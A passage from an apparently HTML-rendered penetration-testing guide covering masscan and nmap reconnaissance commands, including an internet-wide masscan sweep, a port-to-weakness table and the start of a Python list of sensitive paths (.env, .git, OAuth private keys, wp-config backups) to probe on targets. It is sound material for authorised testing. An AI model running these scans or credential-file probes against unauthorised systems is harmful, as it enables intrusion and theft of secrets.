&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;--source-ip&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Source IP (for banner grabbing)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;--source-ip 192.168.1.200&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;--shard&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Splits scan across N machines&lt;/td&gt;
&lt;td&gt;&lt;code&gt;--shard 1/5&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;--resume&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Resumes interrupted scan&lt;/td&gt;
&lt;td&gt;&lt;code&gt;--resume paused.paused&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-iL&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;IP list from file&lt;/td&gt;
&lt;td&gt;&lt;code&gt;-iL targets.txt&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h4 id="essential-commands-1" &gt;
&lt;div&gt;
&lt;a href="#essential-commands-1"&gt;
###
&lt;/a&gt;
Essential Commands
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Fast scan of common ports in subnet&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;masscan 192.168.1.0/24 -p80,443,22,21,8080,8443,3306,5432 --rate &lt;span style="color:#ef9f76"&gt;10000&lt;/span&gt; -oL scan.txt
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Full scan of 1 host&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;masscan 187.62.129.47 -p1-65535 --rate &lt;span style="color:#ef9f76"&gt;10000&lt;/span&gt; -oJ full.json
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Banner grabbing (requires --source-ip)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;masscan 10.0.0.0/8 -p80,443,22 --banners --source-ip 192.168.1.200 --rate &lt;span style="color:#ef9f76"&gt;5000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Sharding (4 machines, each scanning 25%)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;masscan 0.0.0.0/0 -p80,443 --rate &lt;span style="color:#ef9f76"&gt;100000&lt;/span&gt; --shard 1/4 -oB shard1.bin
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="output-parsing" &gt;
&lt;div&gt;
&lt;a href="#output-parsing"&gt;
###
&lt;/a&gt;
Output Parsing
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# JSON → IP:port&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;jq -r &lt;span style="color:#a6d189"&gt;&amp;#39;.[] | &amp;#34;\(.ip):\(.ports[0].port)&amp;#34;&amp;#39;&lt;/span&gt; scan.json | sort -u
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Grepable → IP:port&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;grep &lt;span style="color:#a6d189"&gt;&amp;#34;open&amp;#34;&lt;/span&gt; scan.grep | awk &lt;span style="color:#a6d189"&gt;&amp;#39;{print $2&amp;#34;:&amp;#34;$5}&amp;#39;&lt;/span&gt; | tr &lt;span style="color:#a6d189"&gt;&amp;#39;/&amp;#39;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39; &amp;#39;&lt;/span&gt; | awk &lt;span style="color:#a6d189"&gt;&amp;#39;{print $1&amp;#34;:&amp;#34;$3}&amp;#39;&lt;/span&gt; | sort -u
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# List → filter open&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;grep &lt;span style="color:#a6d189"&gt;&amp;#34;^open&amp;#34;&lt;/span&gt; scan.txt | awk &lt;span style="color:#a6d189"&gt;&amp;#39;{print $4&amp;#34;:&amp;#34;$3}&amp;#39;&lt;/span&gt; | sort -u
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="43-nmap--deep-enumeration" &gt;
&lt;div&gt;
&lt;a href="#43-nmap--deep-enumeration"&gt;
##
&lt;/a&gt;
4.3 Nmap — Deep Enumeration
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Nmap is for detailed analysis of already discovered hosts.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Full enumeration of 1 host&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;nmap -sV -sC -O -p- --reason target.com
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Stealth scan (slower, less detectable)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;nmap -sS -Pn -n -T2 --max-retries &lt;span style="color:#ef9f76"&gt;2&lt;/span&gt; -p 1-1000 target.com
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# OS detection&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;nmap -O target.com
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Specific NSE scripts&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;nmap --script http-enum,http-headers,ssl-enum-ciphers target.com
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="44-decision-rule--which-scanner-to-use" &gt;
&lt;div&gt;
&lt;a href="#44-decision-rule--which-scanner-to-use"&gt;
##
&lt;/a&gt;
4.4 Decision Rule — Which Scanner to Use?
&lt;/div&gt;
&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Scenario&lt;/th&gt;
&lt;th&gt;Tool&lt;/th&gt;
&lt;th&gt;Why&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Single target, ~1000 ports&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;RustScan&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Fastest (3s)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Range /24 (254 hosts)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Masscan&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;2s at 10k pps&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Range /8 or larger&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Masscan&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Only one that handles the scale&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Deep enumeration (1 host)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Nmap&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;NSE scripts, OS detection&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Mass banner grabbing&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Masscan&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Custom TCP stack&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Unstable network, packet loss&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Nmap&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Smart retry&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Pipeline + Nmap&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;RustScan&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Automatic pipe &lt;code&gt;-- -sV -sC&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3 id="45-integrated-pipeline" &gt;
&lt;div&gt;
&lt;a href="#45-integrated-pipeline"&gt;
##
&lt;/a&gt;
4.5 Integrated Pipeline
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Fast masscan to find hosts + ports&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;masscan 10.0.0.0/24 -p1-65535 --rate &lt;span style="color:#ef9f76"&gt;10000&lt;/span&gt; -oJ masscan_out.json
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Extract IP:port from open ones&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;jq -r &lt;span style="color:#a6d189"&gt;&amp;#39;.[] | &amp;#34;\(.ip):\(.ports[0].port)&amp;#34;&amp;#39;&lt;/span&gt; masscan_out.json | sort -u &amp;gt; alive.txt
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. Deep nmap only on confirmed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;while&lt;/span&gt; &lt;span style="color:#f2d5cf"&gt;IFS&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;: &lt;span style="color:#99d1db"&gt;read&lt;/span&gt; ip port; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; nmap -sV -sC -p &lt;span style="color:#f2d5cf"&gt;$port&lt;/span&gt; &lt;span style="color:#f2d5cf"&gt;$ip&lt;/span&gt; -oN nmap_&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;ip&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;_&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;port&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;.txt
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt; &amp;lt; alive.txt
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="ports-and-their-meanings-in-a-pentest-context" &gt;
&lt;div&gt;
&lt;a href="#ports-and-their-meanings-in-a-pentest-context"&gt;
##
&lt;/a&gt;
Ports and Their Meanings in a Pentest Context
&lt;/div&gt;
&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Port&lt;/th&gt;
&lt;th&gt;Service&lt;/th&gt;
&lt;th&gt;What to look for&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;21&lt;/td&gt;
&lt;td&gt;FTP&lt;/td&gt;
&lt;td&gt;Anonymous login, credentials in files&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;22&lt;/td&gt;
&lt;td&gt;SSH&lt;/td&gt;
&lt;td&gt;Version, brute force, key-based auth&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;80/443&lt;/td&gt;
&lt;td&gt;HTTP/HTTPS&lt;/td&gt;
&lt;td&gt;.env, .git, APIs, admin panels&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3000&lt;/td&gt;
&lt;td&gt;Coolify/Grafana&lt;/td&gt;
&lt;td&gt;Deploy panel, metrics&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3306&lt;/td&gt;
&lt;td&gt;MySQL&lt;/td&gt;
&lt;td&gt;Exposed without firewall, brute force, EOL CVEs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5000&lt;/td&gt;
&lt;td&gt;Flask/Werkzeug&lt;/td&gt;
&lt;td&gt;Debug console, endpoints without auth&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5432&lt;/td&gt;
&lt;td&gt;PostgreSQL&lt;/td&gt;
&lt;td&gt;Exposed, credentials in .env&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6379&lt;/td&gt;
&lt;td&gt;Redis&lt;/td&gt;
&lt;td&gt;No password, cached data&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8080&lt;/td&gt;
&lt;td&gt;HTTP alt&lt;/td&gt;
&lt;td&gt;Config different from port 80, Tomcat, Jenkins&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8443&lt;/td&gt;
&lt;td&gt;HTTPS alt&lt;/td&gt;
&lt;td&gt;Direct Apache (bypass nginx), Tomcat&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;9000/9001&lt;/td&gt;
&lt;td&gt;MinIO/S3&lt;/td&gt;
&lt;td&gt;Public storage, upload without auth&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;9090&lt;/td&gt;
&lt;td&gt;Prometheus&lt;/td&gt;
&lt;td&gt;Metrics, internal endpoints&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;9200&lt;/td&gt;
&lt;td&gt;Elasticsearch&lt;/td&gt;
&lt;td&gt;No auth, index dump&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;27017&lt;/td&gt;
&lt;td&gt;MongoDB&lt;/td&gt;
&lt;td&gt;No auth, collection dump&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;hr&gt;
&lt;h2 id="5-web-enumeration" &gt;
&lt;div&gt;
&lt;a href="#5-web-enumeration"&gt;
#
&lt;/a&gt;
5. WEB ENUMERATION
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="51-sensitive-files--always-test" &gt;
&lt;div&gt;
&lt;a href="#51-sensitive-files--always-test"&gt;
##
&lt;/a&gt;
5.1 Sensitive Files — ALWAYS TEST
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;This is the first thing to do on any target. Success rate is high on neglected infrastructure.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;requests&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;base &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;files &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Environment &amp;amp; Config&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/.env&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/.env.example&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/.env.production&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/.env.local&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/.env.backup&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/.env.bak&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/.env.old&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/.env.dev&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/.env.staging&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/config/.env&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Git&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/.git/config&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/.git/HEAD&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/.git/index&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/.git/refs/heads/master&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/.git/logs/HEAD&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Laravel&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/storage/oauth-private.key&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/storage/oauth-public.key&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/storage/logs/laravel.log&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/storage/logs/laravel-*.log&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/storage/framework/views/*&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Docker / Deploy&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/Dockerfile&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/docker-compose.yml&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/docker-compose.override.yml&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/Procfile&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/.dockerignore&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Package Managers&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/composer.json&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/composer.lock&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/package.json&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/package-lock.json&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/yarn.lock&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/Gemfile&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/Gemfile.lock&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/requirements.txt&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/Pipfile&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/Pipfile.lock&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/Cargo.toml&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/go.mod&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Frameworks&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/artisan&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/server.php&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/web.config&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/wp-config.php&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/wp-config.php.bak&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/wp-config.php~&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/wp-content/debug.log&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/readme.html&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Source Maps (reconstruct source code!)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/assets/index-*.js.map&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/build/*.js.map&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/static/js/*.js.map&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/js/*.js.map&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Debug / Info&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/phpinfo.php&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/info.php&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/test.php&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/debug&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/actuator&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/actuator/env&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/actuator/health&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/actuator/beans&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/actuator/mappings&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/swagger-ui.html&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/swagger-ui/index.html&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/v2/api-docs&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/v3/api-docs&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/graphql&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/graphiql&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/playground&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Panels&lt;/span&gt;
